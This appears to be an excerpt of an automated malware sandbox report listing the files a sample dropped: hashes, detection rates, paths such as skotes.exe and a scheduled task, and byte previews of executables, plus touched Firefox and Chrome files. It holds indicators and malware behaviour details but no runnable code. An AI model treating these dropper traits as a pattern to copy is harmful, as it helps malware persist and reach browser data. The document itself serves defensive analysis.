SHA-256:	74B6AFA1CA9ACBFEDF4F2914C5FA98A7BA622022C0017E8B4426500263719617
SHA-512:	1CCB67495DEC03213414FF1525BD7C444F060771CE4F625CAEDA98748E096A666E2F278971719BEEC8C27EE76811B52A8C24428D8EB67F9089F33AFE8C866406
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I...........@.................................\...p....p.............................................................................................................. . .`.......b..................@....rsrc........p.......r..............@....idata .............t..............@... ..*..........v..............@...ackgsmri....../......x..............@...nodwasaq.....`I......,..............@....taggant.0...pI.."...0..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1789440
Entropy (8bit):	7.943914577475808
Encrypted:	false
SSDEEP:	49152:EWDzR3kVKyvwxbdJ60Lsv33hf+EsV7i7EO7Hf:EA+rkhJ60YJcV69b
MD5:	C524F231DBE4C55A328876F06E2A82D1
SHA1:	8D4C24359D577FCBC818158FC79554169690273B
SHA-256:	9561F2E19612F381DFBE538BA59F4F6F4CEFE5D0D0F26F0B7FA1FCD095B9F708
SHA-512:	1020928371C8423FA4724A3D603D7B2823F97EAE93190CC1337D95993ACAB9507BB3F361026D1757ACB64C26E553BA17E6CB91020E0A525ACF2B24AA167328A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................$.......Ph...........@...........................h...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... ..)...$......v..............@...wkrmqwho......N......x..............@...fzxxpvmm.....@h......(..............@....taggant.0...Ph.."...,..............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	923136
Entropy (8bit):	6.594070874460461
Encrypted:	false
SSDEEP:	12288:gqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgavT3:gqDEvCTbMWu7rQYlBQcBiT6rprG8aL3
MD5:	1B2A1D49F92876B02C7B1BD1EC1EA860
SHA1:	ADECD3CA9C41F08A9FC03CC4B2A78E91BA1C458C
SHA-256:	22D27367946299F0AF143B358FD3883BE24CDDEA3C40CAB15F6F96B906BCA976
SHA-512:	E27F8255F1B7BEE54070C61B35F954F838246CB033BF6472C5D2F5B6EC6CF73602B55B6DA73595F388E138486889463EDCA90CE79AF2B0597DEA899CA4A17E95
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....@g.........."..........f......w.............@..........................p......2.....@...@.......@.....................d...\|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2819584
Entropy (8bit):	6.493391639764589
Encrypted:	false
SSDEEP:	49152:Uel2vJ/sO2P+lvS2VPHcLDEfvpTQFz1EvY:Uel2vNH2P+l62a/rF
MD5:	739F477149675DE9EA6D954BB446FFAE
SHA1:	ACA9016270132680F49490050E36BE6B3D890528
SHA-256:	DE661C359365B8B0C0287FDC01881B208744ACA0341A21BC271970975BF91307
SHA-512:	49FBD92EC2E08DAA9BFE3653C14CF346E716C875B9D2593420FB55431B568CF9295D8EE65A98864EF90C1F591550A1CF3A5DEA3CB4F285E657723F84712A977D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.....W.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...jajeyrhy...........:..............@...xqskffqo. ...`+....................@....taggant.@....+..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsKECFIDGCBF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1881600
Entropy (8bit):	7.955307386282857
Encrypted:	false
SSDEEP:	49152:xrUNrzMgD26tRCQfktF4r43FSnP/MroaSYKCSltdDFBjn:upD26t0WkFq4VGMroaS3CitdvD
MD5:	09109FBE23B94BD3DC2605D7AB550CE3
SHA1:	3720744B4F909C4D98756C822C33FFA1F9F77B8B
SHA-256:	94A2471C4477560421CD9FB3FF6CBA275C459499C11D92436E88D1C11FC56CD1
SHA-512:	843535D1720736A7325BDF77F46184D8C0C0FF5F45C8E42B2517E021D370A51D4CA91847FC454C1DCF411126449D8E96741B1965861992D5344CAF636D5F6CE1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K...........@.................................W...k.......H....................J...............................J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .p*.........................@...brwftgiw..... 1.....................@...oajgfsxl......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3621
Entropy (8bit):	4.9291022850404005
Encrypted:	false
SSDEEP:	96:8S+OfJQPUFpOdwNIOdYVjvYcXaNL+cn8P:8S+OBIUjOdwiOdYVjjwL3n8P
MD5:	59E6F925B9895782FEC8FC00467DF6F4
SHA1:	A38D6930FA4D2FB7B593B27D06C3836F005CDD71
SHA-256:	15225A41B2B5485220114CB136DF5FB315BB40FDF140A98D4AEC16B44DDC93E6
SHA-512:	F82A7BB1BEBAFF9D663EE694E36486FBDB1022194ACA4598A9343FB1803EE0F1969A75D1A8BC56377C27D78746AC8AC00BA82E9D4EE26B44C82F936F296BA2FB
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"c5d95379-f4ee-4629-a507-6f15a0e93cd4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-03T11:50:29.548Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Windows WIN.INI
Category:	dropped
Size (bytes):	200
Entropy (8bit):	5.391255133360986
Encrypted:	false
SSDEEP:	3:tZAQUsjcmktYWwktUp/UNE2aT/P4WX1rDZjrEFwHQ3ZjrEFwslyy:JWtYWXtUp8babN1rDVEFycVEFL
MD5:	3FB561547A46AF02D6B00F86DC370634
SHA1:	914867E4C763611B441835A3FC0082359FBF7277
SHA-256:	5393F0E8D90EE6A26EAC13B81B83EDC0637487B3E427175021D7EC4CDE8E34A7
SHA-512:	0E05486A6B6AD65D3A95FCFE46BE6687DD47E311374F11DE89F9CFB8C301951D6BFE43FA24851A3E759B6F8AF69A5F593568FB61F576AB52941F6B2B6EE54BC8
Malicious:	false
Preview:	[Compatibility]..LastVersion=118.0.1_20230927232528/20230927232528..LastOSABI=WINNT_x86_64-msvc..LastPlatformDir=C:\Program Files\Mozilla Firefox..LastAppDir=C:\Program Files\Mozilla Firefox\browser..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1463
Entropy (8bit):	4.574593760134356
Encrypted:	false
SSDEEP:	24:Y5FKFpovPVKFpovPFKFpovdlgKFpovVfKFpovQ/SKFpovNkmKFpovHmKFpovdh9m:YTJpVWtbbFZ+Vpk5t
MD5:	9AB26458FA5ECE134CE4EFE3EA06EE6A
SHA1:	C919123D4A4A3123DED72B3445BF98FC96C20846
SHA-256:	F50CBF6C3B129B43895AB854F81C3B7137CD892BE34C84082115838461643523
SHA-512:	5749E9033654803A20F22E2F0C77BF5B816AD3AB7ACD081882AB861B496C615F99BF4135C500C52EE1A1D3500F1487282726AF839CBABFBE504EA3BA91A6352A
Malicious:	false
Preview:	{"formautofill@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"pictureinpicture@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"screenshots@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"webcompat@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"default-theme@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"addons-search-detection@mozilla.com":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"google@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"amazondotcom@search.mozilla.org":{"permissions":["internal:svgContex

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.035080946068798996
Encrypted:	false
SSDEEP:	3:GtlstF//aLOeqdllltlstF//aLOeqOx89//alEl:GtWtt1lltWtt1Ox89XuM
MD5:	AEEC2E5312D66E03BA0B9574A3471343
SHA1:	3133908ADC5590BEB6946C1A92D95CBBF3A1AA6D
SHA-256:	C50FCC2F4B375E4A4B9E59F224243B8697219A645B78837970522123AF1791EE
SHA-512:	3A722CC8F2F81E23972DC1C95B87800C5726DA806C4A6AB05A2971DD49C811C61C8263DB60D65B9CA3FD0F9E4CCDD9E962DD6FBE98FB74F459E66B6CDA99AA4F
Malicious:	true
Preview:	..-.....................(..;N%$.(..bu..q...#.....-.....................(..;N%$.(..bu..q...#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	12022
Entropy (8bit):	5.489431979860773
Encrypted:	false
SSDEEP:	192:4naRtLYbBp6ohj4qyaaX86KWPK5RfGNBw8djSl:1eKquticwu0
MD5:	C0337F84E78BBCD677EAD5D2AD820AB3
SHA1:	9416B6DC2FF1587BD77DAAEAD619BEF0D337BC45
SHA-256:	88AC78933921E5BB137A80D6E65B279C946EFE110535B5647517894D0D115849
SHA-512:	B7F9D0890D34C63AD2FF94453A4B3D76B1EC31E9E1CD71952B9F9023E662E43CF58E221A17F0923E457A540E330158EA419F3CFAE68B80D2658C350580865872
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1732310876);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	12022
Entropy (8bit):	5.489431979860773
Encrypted:	false
SSDEEP:	192:4naRtLYbBp6ohj4qyaaX86KWPK5RfGNBw8djSl:1eKquticwu0
MD5:	C0337F84E78BBCD677EAD5D2AD820AB3
SHA1:	9416B6DC2FF1587BD77DAAEAD619BEF0D337BC45
SHA-256:	88AC78933921E5BB137A80D6E65B279C946EFE110535B5647517894D0D115849
SHA-512:	B7F9D0890D34C63AD2FF94453A4B3D76B1EC31E9E1CD71952B9F9023E662E43CF58E221A17F0923E457A540E330158EA419F3CFAE68B80D2658C350580865872
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1732310876);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4538
Entropy (8bit):	5.033837783611482
Encrypted:	false
SSDEEP:	48:YrSAYV6UQZpExB1+anOsW4Vh351VxWRzzc8eYMsku7f86SLAVL7if5FtsfbcbyJW:ycVyTEr5QFRzzcMvbw6KkCrmc2Rn27
MD5:	4A9BF886EC500A9638DB7F94FACBF0DA
SHA1:	350AD20EA192F359B938EC56229C49F2FB8EB9F4
SHA-256:	8530F58012026B2C390EFA53C58B2F2EB60CF132F4B7929110F2E1EEE340EEA4
SHA-512:	B9277F282DBBDCFEC4454691B2AE2BBD86221318E5F6E9E0EA43B066DD8D11ECCBC2CE4DF58DCD41A78149490E985D70DDEBF59303F6400D2FE9E8EB59176B8E
Malicious:	false
Preview:	{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-11-22T21:27:59.743Z","profileAgeCreated":1696333826043,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

C:\Users\user\DocumentsKECFIDGCBF.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1881600
Entropy (8bit):	7.955307386282857
Encrypted:	false
SSDEEP:	49152:xrUNrzMgD26tRCQfktF4r43FSnP/MroaSYKCSltdDFBjn:upD26t0WkFq4VGMroaS3CitdvD
MD5:	09109FBE23B94BD3DC2605D7AB550CE3
SHA1:	3720744B4F909C4D98756C822C33FFA1F9F77B8B
SHA-256:	94A2471C4477560421CD9FB3FF6CBA275C459499C11D92436E88D1C11FC56CD1
SHA-512:	843535D1720736A7325BDF77F46184D8C0C0FF5F45C8E42B2517E021D370A51D4CA91847FC454C1DCF411126449D8E96741B1965861992D5344CAF636D5F6CE1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K...........@.................................W...k.......H....................J...............................J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .p*.........................@...brwftgiw..... 1.....................@...oajgfsxl......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsKECFIDGCBF.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.4153432879931946
Encrypted:	false
SSDEEP:	6:ZeTQGAllVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBzlyut0:ZMQdZf2RKQ1CGAFAjzvYRQVBzVt0
MD5:	1ABB444D5B691770E4EC0261E10DD452
SHA1:	CCA8F6BDBA23253C134D1948A3DA9898486A7B70
SHA-256:	564B43A58D80370F2DFC713F47F1071FABD10F962907CD19DF26ED68F6C8BA72
SHA-512:	60B4214023B135495A928DB2F775F7C5F1B193D0089B021C80191AF1D1AF1B52391795317DEF424F85910B964ADEC6B24B2381888810EB54C301E862B7929DAF
Malicious:	false
Preview:	......6 ..EB...Cv..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................$.@3P.........................

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3885)
Category:	downloaded
Size (bytes):	3890
Entropy (8bit):	5.840936029633419
Encrypted:	false
SSDEEP:	96:XbVli+jIrwbPBMts6EQQB7gzeGYLwIva31fffQfo:HPewbPBFf58ezLRa39
MD5:	AE3A1ADD9A7BCC14DDBFFB57E2A1C521
SHA1:	8D93706BD5B01CDFDAA0C1219CEB2FE0E750B0A6
SHA-256:	D792EE9E0A133E6068207DA38B98B238802BBC643C7729DA6392D26495D4B956
SHA-512:	07F5F9223C385E0F38D4E2339381C0B5DA1D6FA6A5BC8F4004033255F98DE66BECB6596D5B38FD21677312A344201B407CDD16EE7E30D738FD322C6C0A1D7F47
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["vintage broncos ford lawsuit","storybook vale disney dreamlight valley","us navy yeoman kendra mcdaniel","snow storm weather forecast","cricket australia","keith lee sushi restaurant","james webb telescope","dogecoin price"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wMjB3eXASH0F1c3RyYWxpYW4gTWVu4oCZcyBDcmlja2V0IFRlYW0y8hBkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQXhDQU1BQUFCZHlWK0lBQUFCVUZCTVZFWC8vLy8vNEFEWkFBRC80UURXQUFEWGVBRHEzcGVZMnVyb3lBRC80d0NkenMzZEFBRG4yYXJ3emdDUzJPbkQydFBiY2dENytmWHc2dG4xOGVqNTJRRGJpb2J5Nyt6NTFRQUFUYXI3Ky8vMjlmWGd2d0NWNFBIb3lSKzFrUURsMVozbjBHMzE5ZWZXUWdEVElRRGFZUURiblFEWFRRRGlxUURZYWdEcTRzcmp5ckhyNEwzdzQ5Zmx5THZneUpEdTNZYlhxSW5qMHBIaHpxN2RzYVB6MlRyVW5IZmYwS2ZsMDRubDJiM1FzanppeGozVXBWVGZ0Q1hUc0FEZmtvWGhwSWJudlliMjdNSFl2bHJ3MX

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	175021
Entropy (8bit):	5.5519862292821776
Encrypted:	false
SSDEEP:	3072:kEBR0Kx4gWiUIzT2Zu2AuhZNsWGUHUylZBTftnn2N2DIWHUm1CBT46mG3bXnejYR:kKR0oWiUIzy42AuXNsWGUHLlZBTftn2b
MD5:	6ECBEC06F6245882E6D9659E66022263
SHA1:	F86FC301A3851511557DF798AD2BAD2AA4659946
SHA-256:	F7885470D82B8357E5AD03205AC0885DD9FD6F965E550D746627E5E35D4CF66B
SHA-512:	F2EDD978C9DC289B82DC0956503659B92C3B621DD1001DB2C5C34ACA01FFCDE7F84A6B24ED0B30A1EA6B15D937B6DD93FAE1DB97DCE26E9F9FCE1A3F5C43A8DD
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTus2ZfPv70D5bJuGT4XDgi-VtNqjg"
